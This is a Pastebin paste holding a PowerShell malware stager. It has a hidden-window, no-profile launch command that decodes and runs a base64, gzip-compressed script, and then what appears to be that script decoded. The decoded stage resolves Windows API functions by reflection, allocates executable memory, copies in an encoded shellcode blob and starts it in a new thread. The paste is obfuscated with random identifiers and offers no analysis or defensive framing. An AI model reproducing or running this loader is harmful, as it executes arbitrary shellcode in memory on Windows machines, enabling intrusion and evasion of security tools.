Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" -nop -w hidden -c &([scriptblock]::create((New-Object System.IO.StreamReader(New-Object System.IO.Compression.GzipStream((New-Object System.IO.MemoryStream(,[System.Convert]::FromBase64String('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'))),[System.IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))
- ############
- function skBq8 {
- Param ($bye, $v_c)
- $itQzF = ([AppDomain]::CurrentDomain.GetAssemblies() | Where-Object { $_.GlobalAssemblyCache -And $_.Location.Split('\\')[-1].Equals('System.dll') }).GetType('Microsoft.Win32.UnsafeNativeMethods')
- return $itQzF.GetMethod('GetProcAddress', [Type[]]@([System.Runtime.InteropServices.HandleRef], [String])).Invoke($null, @([System.Runtime.InteropServices.HandleRef](New-Object System.Runtime.InteropServices.HandleRef((New-Object IntPtr), ($itQzF.GetMethod('GetModuleHandle')).Invoke($null, @($bye)))), $v_c))
- }
- function jrz {
- Param (
- [Parameter(Position = 0, Mandatory = $True)] [Type[]] $ipj,
- [Parameter(Position = 1)] [Type] $qvuIJ = [Void]
- )
- $rUpl = [AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object System.Reflection.AssemblyName('ReflectedDelegate')), [System.Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('InMemoryModule', $false).DefineType('MyDelegateType', 'Class, Public, Sealed, AnsiClass, AutoClass', [System.MulticastDelegate])
- $rUpl.DefineConstructor('RTSpecialName, HideBySig, Public', [System.Reflection.CallingConventions]::Standard, $ipj).SetImplementationFlags('Runtime, Managed')
- $rUpl.DefineMethod('Invoke', 'Public, HideBySig, NewSlot, Virtual', $qvuIJ, $ipj).SetImplementationFlags('Runtime, Managed')
- return $rUpl.CreateType()
- }
- [Byte[]]$nVnT = [System.Convert]::FromBase64String("2ta+xr2ne9l0JPRaMcmxjIPq/DFyFQNyFSRIW5Mqs6RkSj1BVUpZAcZ6KUfr8X98eHeoc8k9jrrKbfLdSG8nPnCgOj+13LdtbqtqghvhtilX5L7OIAfuQDpeMGLv63l87NEw98auwtEWT2gcl6JwWBBcB5Bi4RBnGD2UfLq2Dlk6G8gqMNCedVXncw5hbHLB4zZRxajt+FwVQAS+9j2gtBsq2ZZzwodchHI/9Orr626/nDVowLcLrW1kPwLBYoGk5XKzy58bJ3gB9IKu8SrF+ZhEcWks61k7hius7RcQ8KUlD5QgpLt7nBZzv8IUBYUz6MfJGip7QzZPo9St7Mi1LZs0HFf8t3X0US11qAbZwk+pGd1DqBkdS+NqaNaX1OGvYZNqPL4iIe/bnP9Nak1YNUA0FuzyvuJNjVO0JEjzOaD8Scx6TAVyzS+mEOT+/O01UIt0dTpBxbvO/Ib8e410c7046RCMjJ+biJExYxthugzssTL+wMH7YlFvv1fKCWX6vLLezgsErFgrORvXoPNUXQKA4ArYM32rs+t9Y1xc9xxandKqpTK1rBtUwf4Ix51T+Y/KASt08n+l4AbfonQl3zL9qrU2rUBVYSXgLxMz9WV4aFnVKeZw382NdQposf+hG7kTytvRVzruwadvXnSVeCp2JXnHNk15B7aNESe2zeF03pVFKfvZU11QddWFARHlaa3htj/F865J9wsbzDeHa0SwabfefhzSub2A9FG+wPqXdggr70dYAj6TilV279IuhrpxBg3EJlgE")
- $zzv = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((skBq8 kernel32.dll VirtualAlloc), (jrz @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr]))).Invoke([IntPtr]::Zero, $nVnT.Length,0x3000, 0x40)
- [System.Runtime.InteropServices.Marshal]::Copy($nVnT, 0, $zzv, $nVnT.length)
- $qiK = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((skBq8 kernel32.dll CreateThread), (jrz @([IntPtr], [UInt32], [IntPtr], [IntPtr], [UInt32], [IntPtr]) ([IntPtr]))).Invoke([IntPtr]::Zero,0,$zzv,[IntPtr]::Zero,0,[IntPtr]::Zero)
- [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((skBq8 kernel32.dll WaitForSingleObject), (jrz @([IntPtr], [Int32]))).Invoke($qiK,0xffffffff) | Out-Null
- ###########
Advertisement
Add Comment
Please, Sign In to add comment